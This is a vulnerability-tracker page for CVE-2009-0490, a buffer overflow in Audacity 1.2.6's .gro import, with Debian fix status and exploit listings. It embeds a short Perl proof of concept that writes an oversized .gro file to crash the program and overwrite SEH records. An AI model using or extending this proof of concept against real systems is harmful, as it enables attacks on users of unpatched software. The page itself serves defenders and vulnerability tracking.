CVE-2009-0490

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-7634 dos windows verified text · 1 KB

Houssamix · 2009-01-01

Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)

text exploit Source: Exploit-DB

# -----------------------------------------------------------
#  Author : Houssamix
# -----------------------------------------------------------

# Audacity 1.2.6  (.gro file ) Local buffer overflow POC

# download : http://audacity.sourceforge.net/
# AudacityÂ® is free, open source software for recording and editing sounds.

# Description:
# When we select : project > import midi..   and we import ".gro" file contains long Chars
# The Program Will crash and The Following Happen:

# EAX:05050504  ECX:01414141  EDX:01520608  EBX:0012F154
# ESP:0012EF10  EBP:00000000  ESI:41414141  EDI:00000000
# EIP:006AEC54 audacity.006AEC54

# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote
 
# Poc  : 
# -------------------------------------------------------- 

#!/usr/bin/perl
#[*] Bug : Audacity 1.2.6  (.gro file ) Local buffer overflow
use warnings;
use strict;
my $chars   = "\x41" x 2000 ;
my $file="hsmx.gro";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created . import it in audacity  \n";


# ----------------------------------------------------------

# milw0rm.com [2009-01-01]

EDB-9501 local windows verified

mr_me · 2009-08-24

Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)

Source code queued for fetch — refresh in a moment.

EDB-10322 local windows verified

Encrypt3d.M!nd · 2009-12-05

Audacity 1.2.6 - '.gro' Local Buffer Overflow

Source code queued for fetch — refresh in a moment.

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.3.6-1`
sid	Fixed	`1.3.6-1`
forky	Fixed	`1.3.6-1`
bullseye	Fixed	`1.3.6-1`
bookworm	Fixed	`1.3.6-1`

References

https://security-tracker.debian.org/tracker/CVE-2009-0490

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.